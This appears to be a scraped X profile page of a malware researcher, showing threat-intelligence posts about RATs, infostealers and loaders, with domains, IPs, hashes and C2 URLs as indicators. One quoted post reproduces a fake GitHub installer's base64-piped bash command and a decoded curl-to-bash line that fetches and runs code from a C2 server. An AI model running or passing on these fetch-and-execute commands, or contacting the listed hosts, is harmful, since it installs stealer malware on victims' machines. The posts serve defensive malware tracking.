Greenplan

258 posts

Greenplan banner
Greenplan

Greenplan

@greenplan_it

Malware Researcher

Katılım Ekim 2023
500 Takip Edilen195 Takipçiler
MalwareHunterTeam
MalwareHunterTeam@malwrhunterteam·
@smica83 Also there is a related (by *.ecs-ent-aff-mgr\.in.net traffic) sample that is coming from these urls: https://download-version.1-4-9[.]com/manus https://download-version.1-4-9[.]com/cowork https://download-version.1-4-9[.]com/app 🤷‍♂️
MalwareHunterTeam tweet mediaMalwareHunterTeam tweet mediaMalwareHunterTeam tweet media
English
2
1
5
1.3K
MalwareHunterTeam
MalwareHunterTeam@malwrhunterteam·
Inside the sample is another (base64 encoded) PS script that will load the next stage from: https://*.ecs-ent-aff-mgr\.in.net/JetBrains-91267b64-989f-49b4-89b4-984e0154d4d2 That next stage is also a PS script, that is over 14MB in size and obfuscated... 🤷‍♂️
MalwareHunterTeam tweet mediaMalwareHunterTeam tweet mediaMalwareHunterTeam tweet media
Szabolcs Schmidt@smica83

A possible interesting sample seen from Hungary 'stage1.ps1' @abuse_ch bazaar.abuse.ch/sample/a50e64f… Next stage from: hxxps://b6e4e8b3542c2807.ecs-ent-aff-mgr.in(.)net/JetBrains-91267b64-989f-49b4-89b4-984e0154d4d2 ...doing a POST method to @facebook

English
1
5
13
4.4K
Greenplan retweetledi
Malwarebytes
Malwarebytes@Malwarebytes·
We’ve identified a campaign using job interviews, project briefs, and financial documents hosted on Google Forms to distribute malware, including the PureHVNC RAT. malwarebytes.com/blog/threat-in…
English
2
10
34
3.4K
Greenplan
Greenplan@greenplan_it·
@smica83 @abuse_ch It support different commands and RAT capabilities, but I can't find a particular attribution take_screenshot download_file start_terminal remote_desktop self_uninstall shutdown_host windows_service ws_auth_token
Greenplan tweet mediaGreenplan tweet media
English
0
0
1
43
Greenplan
Greenplan@greenplan_it·
@smica83 @abuse_ch It executes a Golang malware, it's interesting because it brute force part of the AES key😂 Decrypted URLs: https[:]//stat.web-analytics.workers.dev/ https[:]//download.stable-releases.workers.dev/ https[:]//gtm.tagmanager.workers.dev/ https[:]//js.webframework.workers.dev/
Greenplan tweet mediaGreenplan tweet mediaGreenplan tweet mediaGreenplan tweet media
English
2
0
1
63
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
New RAT C2 found. What malware C2 protocol is this is? 🔥 47.83.173.19:5050 🔥 47.84.203.73:5050 🔥 xuanwcai[.]com:5050 🔥 wkaiuahaaxx[.]icu:5050 Links to samples on ANY.​RUN and JoeSandbox available via infosec.​exchange link. @netresec/116040288746020333" target="_blank" rel="nofollow noopener">infosec.exchange/@netresec/1160…
English
2
12
35
8.6K
rifteyy
rifteyy@rifteyy·
In this report, we looked at a signed, low detection job search application created using AdvancedInstaller that deployed multiple payloads - Proxyware, XMRig and a ClipBanker. rifteyy.org/report/cadastr…
rifteyy@rifteyy

Job search application signed by "34.042.832 HIGOR PEREIRA MORAIS" drops 4 Enigma protected applications, ultimately deploying XMRig + ClipBanker + Proxyware reddit.com/r/antivirus/co… virustotal.com/gui/file/21e06… Analysis coming soon

English
1
0
3
154
ܛܔܔܔܛܔܛܔܛ
ܛܔܔܔܛܔܛܔܛ@skocherhan·
ingodgracebabyangelgivenblesswellwithmyl[.]duckdns[.]org 223[.]84[.]7www[.]mpannukwunaanuomo[.]duckdns[.]org 104[.]223[.]84[.]7www[.]mpannukwunaanuomo[.]duckdns[.]org mpannukwugaegbummadu[.]duckdns[.]org mpannukwunaanuomo[.]duckdns[.]org mpannukwummadunawaoo[.]duckdns[.]org angelcamefromtheskypeforsaveyoublessinga[.]duckdns[.]org verybestfuckingpersonieverseeninmylifetrulystupidmanwhoaorundon[.]ydns[.]eu 104[.]223[.]84[.]7 AS36352 COLOCROSSING 🇨🇦 #Remcos
ܛܔܔܔܛܔܛܔܛ tweet media
Suomi
1
1
10
373
Greenplan
Greenplan@greenplan_it·
@smica83 @abuse_ch Related: 45[.]56[.]112[.]40 185[.]196[.]10[.]134 commachecker[.]knightrench[.]click resubmit[.]vkamagras[.]com calldocsinvites[.]site themoondaughters[.]com colburn[.]localsecurespaces[.]org joggle[.]navelyandco[.]com powered[.]buyfildena[.]site deslorat[.]click
English
0
0
0
43
Greenplan
Greenplan@greenplan_it·
@g0njxa @osint_barbie Maybe Related: Lot of domains random[.]github[.]io Redirect to https[:]//sites.google.com/view/github-launcher https[:]//sites.google.com/view/easylaunch The "Download for Mac" redirects to google[.]macos-developer[.]com/main, the Windows version to "Scarface" loader
Greenplan tweet mediaGreenplan tweet mediaGreenplan tweet mediaGreenplan tweet media
English
0
0
1
71
Who said what?
Who said what?@g0njxa·
Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie ) Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2) browndash1368[.]github[.]io >> macos[.]aidevmac[.]com github[.]macos-developer[.]com/main The a bash script is shared: echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash Chaining more bash script from C2 (image 3) /bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)" Then downloading and executing a malicious Mach-O (image 4) Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2" IOCs a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread) ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)
Who said what? tweet mediaWho said what? tweet mediaWho said what? tweet mediaWho said what? tweet media
English
5
16
72
5.8K
Greenplan
Greenplan@greenplan_it·
@smica83 @abuse_ch Vbscript -> Nodejs script > Decrypts with AES-256CBC another NodeJs Script -> NodeJs script -> Decrypts with AES-256CBC two EXEs, one seems related to "MaskGramStealer" 81c64f05034eac236a70df25c58530a4 6b8c67058a071383177ab7867ab841e4
Greenplan tweet mediaGreenplan tweet mediaGreenplan tweet mediaGreenplan tweet media
English
1
1
4
132